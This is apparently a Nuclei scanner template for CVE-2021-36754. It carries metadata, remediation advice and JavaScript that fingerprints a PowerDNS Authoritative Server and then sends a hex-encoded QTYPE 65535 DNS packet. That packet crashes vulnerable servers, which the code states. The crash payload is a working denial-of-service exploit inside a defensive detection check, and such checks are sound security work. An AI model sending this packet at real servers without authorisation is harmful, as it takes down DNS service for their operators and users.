id: CVE-2021-36754
|
|
|
|
info:
|
|
name: PowerDNS Authoritative Server - Denial of Service
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
PowerDNS Authoritative Server 4.5.0 before 4.5.1 allows anybody to crash the process by sending a specific query (QTYPE 65535) that causes an out-of-bounds exception.
|
|
impact: |
|
|
Attackers can crash the server process, leading to denial of service and potential service disruption.
|
|
remediation: |
|
|
Upgrade to version 4.5.1 or later.
|
|
reference:
|
|
- http://www.openwall.com/lists/oss-security/2021/07/26/2
|
|
- https://doc.powerdns.com/authoritative/security-advisories/powerdns-advisory-2021-01.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-36754
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-36754
|
|
cwe-id: CWE-119
|
|
epss-score: 0.84525
|
|
epss-percentile: 0.99309
|
|
cpe: cpe:2.3:a:powerdns:authoritative_server:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: powerdns
|
|
product: authoritative_server
|
|
tags: cve,cve2021,js,dns,powerdns,authoritative_server,dos,intrusive,vkev
|
|
|
|
javascript:
|
|
- pre-condition: |
|
|
// Pre-condition for the check: evaluated with the Host and Port template arguments before the code section.
// NOTE(review): UDP has no handshake, so an "open" result is presumably best-effort; confirm how isUDPPortOpen decides.
isUDPPortOpen(Host,Port);
|
|
|
|
code: |
|
|
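// Intrusive check for CVE-2021-36754: fingerprint the server, send the
// QTYPE 65535 query, then re-probe to see whether the server still answers.
// A vulnerable server process is crashed by this check.
const net = require("nuclei/net");

const target = `${Host}:${Port}`;

// DNS query for "version.bind" (type TXT, class CH) with an OPT record.
// The reply's version string is what the fingerprint below looks for.
const validPacket = "1ea0012000010000000000010776657273696f6e0462696e64000010000300002904d000000000000c000a00089f750bc0808677d1";
// DNS query carrying QTYPE 65535 (0xffff), the query type named in the description.
const dosPacket = "296e01200001000000000001046f617374026d6500ffff000100002904d000000000000c000a000805dbdf1a40effcf4";

/**
 * Sends one hex-encoded datagram to the target and returns the reply.
 * The connection is closed on every path, so a failed receive does not
 * leave the socket open (the original skipped Close() when the final
 * liveness probe threw).
 * Errors from Open/SendHex/RecvString propagate to the caller.
 */
function query(hexPacket) {
  const conn = net.Open('udp', target);
  try {
    conn.SendHex(hexPacket);
    return conn.RecvString();
  } finally {
    conn.Close();
  }
}

let verdict = "Not Vulnerable";

// Fingerprint first. An error here propagates, as in the original.
const banner = query(validPacket);

// Only continue against a server that identified itself as PowerDNS
// Authoritative Server. The original sent the crash query to every DNS
// server and discarded the outcome when the fingerprint had not matched;
// skipping it leaves the verdict unchanged and avoids disturbing other
// DNS software.
if (banner.includes("PowerDNS Authoritative Server")) {
  const conn = net.Open('udp', target);
  try {
    conn.SendHex(dosPacket);
    try {
      conn.RecvString();
    } catch {
      // A receive error is expected when the process has gone down.
    }
  } finally {
    conn.Close();
  }

  // Liveness re-probe: any error is treated as "server is down".
  // NOTE(review): a single dropped datagram, a receive timeout or rate
  // limiting looks the same as a crash here, so a positive result should
  // be confirmed against the installed version (fixed in 4.5.1).
  let isUp;
  try {
    query(validPacket);
    isUp = true;
  } catch {
    isUp = false;
  }

  if (!isUp) {
    verdict = "Vulnerable to CVE-2021-36754";
  }
}

Export(verdict);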
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 53
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'Vulnerable to CVE-2021-36754'
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- success == true
|
|
# digest: 4b0a00483046022100d8822ee75f42f6c9fe6135cd75626b01cbcb84144c6c574570f8f5666c92ea3c022100f91da9b561427fd66b780760ece8dce02e7b2c0f274cae76f12a017c8cbca1d6:922c64590222798bb761d5b6d8e72950 |